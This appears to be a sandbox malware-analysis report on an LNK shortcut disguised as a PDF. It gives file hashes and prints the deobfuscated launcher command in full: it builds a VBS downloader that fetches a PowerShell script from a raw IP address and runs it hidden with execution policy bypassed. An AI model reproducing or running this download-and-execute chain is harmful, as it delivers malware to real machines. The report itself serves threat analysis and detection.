Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b4d06cd0060be0aab67bace081f5606d
Sha1
72508dfd4052ef09bef8bbe084dcb7b3cb3ef527
Sha256
e1db60a7cf4bfef5fe8cc9706d6fa707228fcce1c9ed442a6cbdcecb9d66374d
Sha384
acfbb4cc089d27727d11a468be6a31532d1949bc2be84a0deaecfc36e97471c3a3c2f509982eba599dba82955f01e528
Sha512
6a62922530f21e016d519c689e0f0ee0c68476730c9fc636990fa588e8ba69d716f65e6f04e154aa3d931658fcee1ca97daea85bb48f4cb0a9fc2b6636eff86f
SSDeep
24:8d/2fnyf1SiXnSpVT6hCg8Bxb1En92M9RrTU:8l2fnydXnSpEUZb1U28
TLSH
8593AC8165FC0304F2F6BE35DA3A6B82093BB9D0ED72C75C8D948C0D1920A56ED72F66
File Structure
Gorschenuk_Vechernie_Zapiski.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary].deobfuscated.vbs
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/madlybibliography.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\VCdjhY.ps1",2 > %TEMP%\vhiO.vbs && cscript //b %TEMP%\vhiO.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\VCdjhY.ps1 & del %TEMP%\vhiO.vbs"
URLs in VB Code - #1

http://193.169.194.40/S7yhd67/madlybibliography.ps1
Deobfuscated PowerShell

& Remove-Item "%TEMP%\vhiO.vbs"
Deobfuscated PowerShell

& Remove-Item "%TEMP%\vhiO.vbs IconLocation: imageres.dll"
Gorschenuk_Vechernie_Zapiski.pdf.lnk (94.14 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙